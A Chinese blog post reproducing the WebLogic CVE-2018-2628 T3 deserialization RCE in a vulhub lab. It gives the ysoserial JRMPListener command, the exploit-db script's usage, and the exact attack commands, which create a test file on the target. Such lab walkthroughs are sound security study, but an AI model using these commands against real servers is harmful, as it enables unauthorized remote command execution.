Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)复现
2020-08-24 15:49:30 Author: www.secpulse.com(查看原文) 阅读量:457 收藏

漏洞介绍

    Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

漏洞环境:

我这里是直接用vulhub搭建环境 docker-compose up -d 如图就搭建好了

1.jpg

访问一下your-ip:7001/console,这里会自动进行一些环境部署,出现登录界面就是搭建完成了。

2.jpg

攻击准备

java反序列化漏洞需要用到ysoserial

https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

用法:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

这里我们主要填一下想要用的端口[listen port]和‘命令’就可以了。

exp:是exploit-db里的脚本,向目标Weblogic(http://your-ip:7001)发送数据包:

https://www.exploit-db.com/exploits/44553

主要用法:python exploit.py  [目标 ip]  [目标 port]  [path to ysoserial]  [JRMPListener ip] [JRMPListener port] [JRMPClient]

JRMPListener ip也就是本机ip,JRMPListener port是我们使用ysoseral命令时的设定的端口,接下来我用实例复现

有了工具我们就可以直接攻击了。

漏洞攻击:

java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 'touch /opt/1.txt'

1.在Ubuntu主机上运行JRMPListener开启端口监听。使得触发漏洞后weblogic所在服务器可以远程调用执行特定的程序。

F3.jpg

2.用exp进行攻击。

python CVE-2018-2628\(exploit\).py 192.168.127.136 7001  ysoserial-master-30099844c6-1.jar 192.168.127.136 4444 JRMPClient

4.jpg

3.我们在docker看一下是否成功了

先docker ps一下

5.jpg

docker exec -it f72fee23afa1 /bin/bash

~/Oracle/Middleware# cd /opt

/opt# ls 1.txt(我们成功用命令创建的文件)

6.jpg

本文作者:hatjwe

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/139276.html


文章来源: https://www.secpulse.com/archives/139276.html
如有侵权请联系:admin#unsafe.sh